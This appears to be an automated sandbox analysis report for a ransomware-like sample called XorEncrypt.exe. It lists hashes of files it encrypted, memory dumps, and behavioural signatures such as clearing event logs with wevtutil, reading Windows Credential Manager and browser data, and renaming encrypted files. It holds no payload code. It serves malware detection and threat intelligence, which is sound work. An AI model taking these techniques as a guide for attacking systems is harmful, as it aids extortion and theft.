SHA1 f8f3722a4bd1d966d4ed5805dcfdadf4ba33e8ef
SHA256 03a891286e205ba99250bcb1bc4391a7dfafec8959d7b022f1fdd101994b7b93
SHA512 bd15a73a19bfb2503da9e59b0230e27226c57e3f3ab4268b8658fb917d67054b5e46a47e090f36499ded7f44b21c5684a5e9268220252c64022ee716453aadf0

C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\library.js.key-YEEISFLSETDV.0xcf41769d063c9

MD5 cd286324895d4daa9b02e5d147bd36f6
SHA1 98d1d0959994c2e8b0291755e8aa5b6a306ec453
SHA256 bdfca98694d0fe47e25d685784f70e0088616acf5fb393cc7d6f592a5514cdf9
SHA512 647a7db9f3e229005d0c4c0bc2c89f9c1e3bd7bf837862c13bfb86ba4788b7db6e6a740826be349f54f6ff45ea1c99d0fddcf1d03a7dfa5b7771a09a8d6df791

C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\service.js.key-YEEISFLSETDV.0xcf41769d063c9

MD5 b263253e9493c988c5bb1bfc5e72886b
SHA1 11a5de4604d1d043d6bb668b384fe1950026811d
SHA256 4d3fdd80d51eea668848208f0dfcee435f98cae87b8b1061e0db601eda170d8c
SHA512 98807cabf6b6a35ee05dbd8d4d3a450d139c964889de74d0bfa257ed47c1f06dd471c8d6fca9e3d3c75a115c46a1682d82e5049604acd8d922a5bd0baa481a4e

C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\css\picturePuzzle.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 72cae315ec275e911fce636f9b23962f
SHA1 cfe7ceb31ff562e0e8ef3e6005a5e8b1881084ce
SHA256 191123ed6eb786ca94d359195c014de518c978fd965717e44ab0d7a2ed910941
SHA512 036de0d451c8c3204952a615e92a344fa0dada710d56ad5936cbf6a883fd790745bb206280006ec35c5f2912f3be4cfde9815e9a7e5c523c57eb171578354dfd

C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\css\settings.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 04e90627bd9bf6b98c1e714fa25e5cb1
SHA1 9387498a882600c239430eb2e141617ce9b91dff
SHA256 8f163ed4345c3204452ed526fd8510d9f10c2b1086cb895da8ece64ad329966c
SHA512 a4bbea2e72a66d852623642d7be62f97ff031b00434c619eb02a4f7794eae7235b4d594a2e5633153cf433cb7095e272d3f69ed7ef7770f7008f58e530e15cdf

C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\css\RSSFeeds.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 ced308e45fc5171a136d5866c06b8ece
SHA1 49a26d01932991fda14a341eaa6655313d339119
SHA256 86bfea164b38481555f2d6468c786303a6def8e83d11e1d999439d927dab0627
SHA512 f3435812c070a6511f52f678cae86acab936d8167bd1e875715fcdbdf1354650e4f9a73e1bdc9c7cca265f13402e60310278639288ad65b8c62b5550b8ea7ff3

C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\css\flyout.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 cc8e1c0feeb8f95e9149b0a1e212f4f6
SHA1 c6b6f0f4b4eb5f604ee78d0db898eaed5089d1d1
SHA256 294380e03e8f53aeccb58b6c45b71d7a0976714b7e6418cc56d1105d496fcc8f
SHA512 16b3870e00c5455556076c15957f033d14431e0e4ec76375dfb29b7436ea73281fe6c1b116aebd40310a6c1baa1f5e9d06fd9abd5dea9d34c92393d5e4b69f25

C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\css\settings.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 1fd8c04be764559c4286f8c10b9e8fb5
SHA1 ba525722765b8fa4d30016b70f77434f2bc8cf6e
SHA256 a861365b5e5db198a1855c24fb1bb31458b6093732c634855435b2a302572626
SHA512 9283916b53def98987715eb4bd653c1b64a99bfa58947e8887317dcb60ed0bfa058bbfebf0d6af0df9a5696473e2c89dcddabe8b42e5a36db74dc99200f3a942

C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\it-IT\js\settings.js.key-YEEISFLSETDV.0xcf41769d063c9

MD5 3a39b596cfbd549c08e567c560b5860c
SHA1 99ea9e2fd3f50f076463ed68e380722a1b086198
SHA256 901f8d4c13492a33786042e3851fd6ce81c1d5c004bf58308f0603a3afb1e60d
SHA512 4989fd8a0ba1ed1fee411419ec2760d0dbb0a5c4fedb18c7a87e572799fd0a992ae867919532969d61e66aace42782fe24becc9d3a80f8fa552d5117ce3cc3a8

C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\logo.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 6632e11f675e2e0745b20846fc1c3e1f
SHA1 e4c0f157bf24d8a8baeb9884e7657aabb605de5c
SHA256 0d0a91948bf4d069af14c582a25f86b1c0a72a1ab8b69092539530feeb98e6f9
SHA512 43454d9cfe1026e4e18d8d95412c087b9a4741c4a466de6002dd4d2d8972e5facb8c94512105d97ae12ad6db242ac0c280701037fad625fbc7d2acc643aedd29

C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\settings.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 891958940168bf807c2dc8fbdd94b007
SHA1 598b77e69e3704966ca0a92e38d81369fb9b31b1
SHA256 43be700b435a60e1ecd43b42bb8764d413543556ce201dbae2414d32d0bcdb81
SHA512 13b7d6d448fbd601bbe3f2aca4e8587e7233e5e243f340efaf2e1fbe65a0a35c66e9f0a74b5c7b76b90d9d1afd69986f8f32cadd33b93552e2f2990fc9198c30

C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\slideShow.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 b582ac4d6ef5f4f950a2565bfa64aa34
SHA1 39a2d4acfed81479ae9728eb8e167b2927b43ed1
SHA256 e79586e7df46c9bbddbff602c57fde9bf96c19306ea5a235298cc6e5bf45fb85
SHA512 4136071d458f5f1794556d5f07a40847d381b111ca98acdf34d11f37d9f12845e4041eb9e31f12e9e59b5498a4a67046e148148fdb98ad841519fd574fd515d3

C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\38.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 aabe06550d6eadc0232f294fe749a60a
SHA1 46fe97862fbeea7d4a28a60b3bf771e52a0c8979
SHA256 7e251e1c9affb7105c49823d7cdd08bbe2f9cf9da84e0d3b6667dd7004da5a9b
SHA512 7af92aa6d6559045dbcc5d649772819714da497952a3ca66b4ab1f52c04c29462c58bb5e1526bcbdc452e60d22c9c0a8e5db1eef1f1fc28836eabd46aa0f4007

C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\39.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 2e4e0830395101eb87978c518883c8fd
SHA1 369342086d8e94642f4392d05c95c64ba1ecdb87
SHA256 84394ef9b002c59ca1179fd3138d763ae460da3372451f4799f9747ba6da2384
SHA512 3c9f5d021fd87a2c7dc8593978dd3b9c78642e0e9be61fd23dad4b0564b2b2d6558433f2167d8ce13fb4bbd8170fb79bef97f7fa26ddfd7dcdb24dae52e4aee8

C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\41.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 077b716e306b30fce0b22697a989187e
SHA1 3168cb3f335c4f01c51e9d6b2fc482a110dfe468
SHA256 0167b1cb8dbfe3267bcaa4917b0acde6a6d0cd286bd365aa4a59c1b5b0e727bd
SHA512 13911471b9bd27da92da2440cd16f98b40b660d24b6b5b3f7a87e1e95e07d9b90db6854f8a4965c3afc91da4fc2f2eb6a4cba7086fcb8438ff0fe66db7a94884

C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\css\localizedSettings.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 cda799ea512cb638dc3cd8a82e8d9375
SHA1 7f730a94dbfdf534729f3ac83acdee9a333791f8
SHA256 dddd842b1fbd9800406afae30f72b511297536df0a9f4eacfd4dffad52219200
SHA512 a0fc48678f21b054b5337bb5a4f5fcc9a29fc1c1f424e3f03f4caa7add292c3ad977bb82a66dceeb2689ddb173d77222720fd988020352f0187e2aee042eeac4

C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\css\settings.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 cd14470026659a53a9f76d37a90fe77c
SHA1 dc2fa42d42dcd9028d0f03d3d708e9c9cd3467a3
SHA256 1de7c0a66558a1a494cc335c524bd4820cc15532d2c6578e01165b5672e694a1
SHA512 0a70081e800b93d50997af8a2a38e0c6af70c9ac59e4c67b9dac6563076f83546c3236ca8463f7c93622ea40b51c4d5a394a163b5c2025cedc6e8fe29bfc2576

C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\css\weather.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 eaebfc00022713e1e3bb24cf4cc3b9d4
SHA1 599f3ce3fddfe1f6807083b38a9d3cd117af71dd
SHA256 4ab2e6930670975cb05becf0fe2a0494a70a0bdb88c5f9173eeb3021bd82c1e6
SHA512 22d2e062e5cec9e5f01964ee5b6a6d60e2086ae632c260a6edbcba9724486dadbafb847591e66ac5f126cade9ad46ebfbb1d2c91fc2efb0f24bb93c790358eba

C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\highDpiImageSwap.js.key-YEEISFLSETDV.0xcf41769d063c9

MD5 2ae72391be0a74635c3bfbe06078b8b8
SHA1 713293030ccb6032de3b831f80693eb9226d3b04
SHA256 8e2b7d2273b73cabbbcbfaf3a631cfc3eebbe6903805c9bf89d0d5c932d45ed4
SHA512 df0d6f4d3872f47ffd6fe1fad40e16d2d0187c1a5f1eb135532b9959d149e248ba615bad82e5a765bef75f7bda71bb6931619001b29aa1b9b474a0d12dcebb07

C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\library.js.key-YEEISFLSETDV.0xcf41769d063c9

MD5 81eff826c9dcd4eb2d463ede59d45be5
SHA1 0e9f251f47ef1423a5dbe1ec7af3736010aade7c
SHA256 c1d5df66f2d128a117211238e91053c27119511d756442162a5cf8cc42559b51
SHA512 b62fedcfbab9025f582aa59e271a5f8a72f3b3934480c55c6e6ebed729922e713bfaca8f326281a15f19d32002b1bfd4b2704ec28940aa474b2b6f1a41a7c0fd

C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\localizedStrings.js.key-YEEISFLSETDV.0xcf41769d063c9

MD5 924064bb7a59d5af2cbd94b5cc2505b7
SHA1 672fd59bdc21babebeeb6b607c34e3a40960f388
SHA256 c8094ce952862434005b1264fb7852aeb87cd95b1744933b80897a860fcad124
SHA512 08c999128628a6d00e2bed7c1ac04bc80788a89eeaccbe9a66e0fcd2403f25856a22a1c2a74232db7027ec87b2b4cf87ad68ec8f97f41dc0a74ae022b603da5b

C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\settings.js.key-YEEISFLSETDV.0xcf41769d063c9

MD5 38811c62b60ccfee67155a1c332bf3df
SHA1 e3d6ed81e54a45b60525423ca447ae1ba59005e3
SHA256 c6aec16d8844d28ee3285fd33165825c6e7890d5889748a976d5b12d3b61465a
SHA512 0638a90d732ae3cd294a513535d9193fd6e9ec40b1d7262da241bbd5e66065e837d8976256dcb52352a042c45fa8a756e145865fb1b5ecd06d09ccb5924fd38d

C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\weather.js.key-YEEISFLSETDV.0xcf41769d063c9

MD5 e5779941f1fdeb1e108bcfc62709e3f2
SHA1 b7ab220c5eaebaa4c7dc496baee314e33486003e
SHA256 6759e2a271be098f656c5c910b26522c46b51ec9e72e1b46c467a86e2e8c4bf9
SHA512 ac62587edf99e43e8adc951719be4acd2abf7c69a60b4b9f622cb0375660384b85b3466ebad1b7e9340e0f96f46f75c3dd7260435ea62b67b1c28a2e7a7a6af2

C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\settings.html.key-YEEISFLSETDV.0xcf41769d063c9

MD5 1cd18e9ddd06706be79e356df8623d67
SHA1 222972638076939914503a0c126ff7e181aecb7d
SHA256 b18de8e701e35dcb653e560433307fca89fe600d5df9be26096c389e0db3f0ff
SHA512 837fb778a4802f349e64781f33ea6ca30bc20dcd49d860eb94701d1e5233f7a69caa4aab774e679c42fbfb9d18c444fb5d2bcfef43c7596b95499ce8e9cf4e02

C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\weather.html.key-YEEISFLSETDV.0xcf41769d063c9

MD5 d4ac96627b16c2380e3d88bc2bb56724
SHA1 fe8ac9fc3aa26da23bf43cb0f67fb7184a9be3c9
SHA256 e05f1b193fa41d88e51215f31fb9c4e43b7f7115246713e7da05955039ccd631
SHA512 8480146c6334a8ae25c26a99d23c86ad4e432c3c6d6fb8ddd7fb99d3242fa4868af3ef09f9b14aed3caaafa9bbb2aa07a59eb7365310b42223a74e7cd79f4ec6

C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.key-YEEISFLSETDV.0xcf41769d063c9

MD5 54b267c956983216dd495496952d12b6
SHA1 4ebf0a839a700cc17e1c37584de608717125b0fc
SHA256 3e70082187e6b734db40917563fdf5dfb46c65567ff2827b1d3c25153e708899
SHA512 a36e62269b219370b3c3332f148bd17cd0a7c324aebf4dff2bab445c79c08b921667b43f52ac61c04ba28a1682784ef74c62a1a126cf6a08249d4d8243f0e1c1

C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\de-DE\css\currency.css.key-YEEISFLSETDV.0xcf41769d063c9

MD5 e6f6c3393d4b63f1c72a35c6d7976ba1
SHA1 3c2d19ad97196a2a9698d6fa16cc8b0453b6ff3b
SHA256 5c5abe17c5860d2d34ab4939081672529adb20b149f3a72f2d9ff42ec20c278d
SHA512 5c79bb67e054b4026d799e6599ca9642499fab812bbb99735322e21f66488bab70f3477ae17191cfc780786611c31aac07afaefb6066379e47891ca4fc6721ad

C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\19.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 74bfeb5845e13d5265fc4fbbd91b652d
SHA1 dd17c9939c2eec14a1bbf4fb8b8dadc7146f4726
SHA256 5fe012253835c16eac5c4b6b5f47425fa2f9188814e2ef53abef059e11fe657e
SHA512 9d7cedc743f2d6f16e297c671d5a5c5b9f7bda33f854ac8bda70a001f303e5343acd0847c18e6a53ae9240ba72967c1d0ca99d672137b6d9eea20540ac22af5d

C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\24.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 55ae75bd52c741bdd552340faec64471
SHA1 e6eb8f1c3a90ab4c751aa7c6e3591c589bb86dbf
SHA256 601e3a7ee64893e9991102459e9a1137486bdd8e588d8a2abeabeeb962739489
SHA512 c38e3540a77907aa1244dfe10083b499f9f638432729b69686e88ac0dd6760a78afb0cff4642def281fef2d2f56539cedad7e98c6fe9d592a56625fd1a6ba66c

C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\27.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 0cbc2998978f1e16dffc39c3dcfef930
SHA1 28fb5be158f7f7d862b3023a78ea96ebaf4dc3c7
SHA256 7ebfe4227abc228dc0ec8e4f5cd3bf870d46e732ec101f35d998bdef0969e0da
SHA512 7eed3c5e9492d76f0f606462272915ea03d0f436a2e203df3cd7c571973441828e649e1a4bb26fbb1fb741e56649eaf96ec5d2ee31aedae8ed6e56e20120628d

C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\29.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 fc9bf87e9821f5ca5879e6b21eab5aa2
SHA1 638f4dfa785c79597f2900fd9c8f39f1c08bced3
SHA256 ccc7a0d7119c82c8aad0aa17e07af663e6fe5e7538bd7208e3fa8c228f8e2853
SHA512 d7ff3ec8c26b0a8decb6738e41bc698527d053e2d795f54dfb960578b47b5e9de385e5b17a0197e5bb03e89b72cd8f0efa5c760081b8df6cc1f43aad48fc2714

C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 7a8162f6b3ff71f8a19c45420b9c16ee
SHA1 6ca2aa47e146a21633849803632de55f26cc2635
SHA256 a3dc0d3eb761a2efb0599cc7931cba3ca73f1c0a8bab961cb8d96232fe465c09
SHA512 333ddce11e35cc2ddf35185be9c5d9a260fe0c3363af1cb8d4f5b97e6526f65ad65d17b7c5fb396e9b5745531ff99df315236cf7376261d19d593cb07e48e575

C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png.key-YEEISFLSETDV.0xcf41769d063c9

MD5 53ba6bb7f11ee7c6fc1a4dafc6f58ecb
SHA1 a83de1441c853f976ebcf5832555d7fdd46f6a63
SHA256 3c78e48eef9c58f6a1a2cb9a96ff4fd347b22d4f5f6fecfd2e973c82ad4d9138
SHA512 03717b9b1e7ac28045c5f8416c014369d80dc38532f7964c6fd31fe9bae24b933c7a822cb900ed29cc5e0e27e34d34e03fedb90c7f29d643d2a516ad05e08d6d

memory/2396-6396-0x000000001B3B0000-0x000000001B692000-memory.dmp

memory/2396-6397-0x0000000000280000-0x0000000000288000-memory.dmp

C:\Users\Public\Del.cmd

MD5 ec6f5056a81f8cd0039405e8539aff7d
SHA1 b141d0bc1c2a4aea92fb7cda27f084a357060ecf
SHA256 46d324eb3c936dfd8b446dbb637e4eb9d49f9c187d236905a4877947c09d76cd
SHA512 8ffa6bc23234180e574e17ff7a0beadbc37c7a4a52e00fb68eec6b63f21250488d109b5009d4ee267b75d093ff51a5ee29249aef7eaf67072dba866e2e2bc3f7

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-12 12:44

Reported

2024-11-12 12:47

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe"

Signatures

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Reads user/profile data of web browsers

spyware stealer

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\ui-strings.js.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcR_Grace-ul-oob.xrm-ms.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest2-pl.xrm-ms.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs\System.Windows.Controls.Ribbon.resources.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\tr\WindowsFormsIntegration.resources.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription5-ul-oob.xrm-ms.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ReachFramework.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\tr\System.Windows.Controls.Ribbon.resources.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-awt-j2se-1.3.2.jar.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\codec\libtwolame_plugin.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTrial-pl.xrm-ms.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-linkedentity.png.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\adal.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\OneNote\SendToOneNote.gpd.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\ui-strings.js.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_Subscription-pl.xrm-ms.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\access_output\libaccess_output_livehttp_plugin.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\tr\WindowsBase.resources.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_radio_selected_18.svg.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk-1.8\LICENSE.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\api-ms-win-core-file-l1-2-0.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\bin\dcpr.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\System.Windows.Forms.Design.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\ui-strings.js.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MSYHBD.TTC.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MTEXTRA.TTF.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Resources.Reader.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\pl-pl\ui-strings.js.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-ul-phn.xrm-ms.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-localization-l1-2-0.dll.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\download.svg.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Java\jdk-1.8\jre\lib\rt.jar.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_KMS_Client-ul-oob.xrm-ms.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GADUGIB.TTF.key-KKBPYCPYOPYS.0xc5ffa1f0ccc01 C:\Users\Admin\AppData\Local\Temp\XorEncrypt.exe N/A
